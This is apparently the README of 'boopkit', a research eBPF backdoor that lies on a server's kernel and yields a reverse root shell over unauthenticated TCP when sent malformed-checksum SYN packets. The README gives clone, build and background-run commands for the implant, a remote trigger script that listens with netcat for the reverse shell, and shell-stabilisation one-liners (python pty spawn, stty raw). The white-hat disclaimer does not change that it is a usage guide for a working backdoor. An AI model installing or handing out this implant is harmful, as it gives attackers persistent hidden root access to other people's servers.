A research project to demonstrate remote code injection over TCP with a malicious eBPF probe.

I am a professional security researcher. These are white hat tools used for research purposes only.

Seriously please use these responsibly.

Install boopkit on a server that is already running any TCP service (EG: nginx, apache, tomcat, etc).

git clone git@github.com:kris-nova/boopkit.git
cd boopkit
make
sudo ./boopkit > /var/log/boop.log &

Trigger a reverse shell over an existing TCP service. Edit the remote launcher script and point it at any TCP server running on the exploited machine!

# edit ./remote/remote as needed
./remote/remote
python -c "import pty; pty.spawn('/bin/bash')"

Enjoy the root shell over unauthenticated TCP.

Can be loaded into the kernel at runtime using the userspace loader program. The probe responds to tcp/tcp_bad_csum events and will pass the saddr (Source Address) up to userspace using an eBPF map.

This is the malicious program that will respond to the bad checksum packets sent to the server. Whenever a malicious packet is sent, the loader program responds with remote code execution.

The trigger binary is a small C program that will send a malformed SYN request without a properly calculated checksum to the server.

The remote script wraps the trigger and will use netcat to listen for a reverse shell.

• 'clang'
• 'linux-headers'
• 'llvm'
• 'libbpf'
• 'lib32-glibc'

• Linux kernel with eBPF enabled/supported
• Ncat running on the server
• Root access :)

After a successful /remote the shell will be very unsightly.

Select one of the commands to run in order to start a cleaner shell.

python -c "import pty; pty.spawn('/bin/bash')"
ruby -e "exec '/bin/bash'"
perl -e "exec '/bin/bash';"

Next move the newly created shell to the background on your local terminal.

Ctrl + z

Update the stty locally.

stty raw -echo && fg

Finally, reconfigure the terminal!

export TERM=xterm-256-color

Source: jasonturley.xyz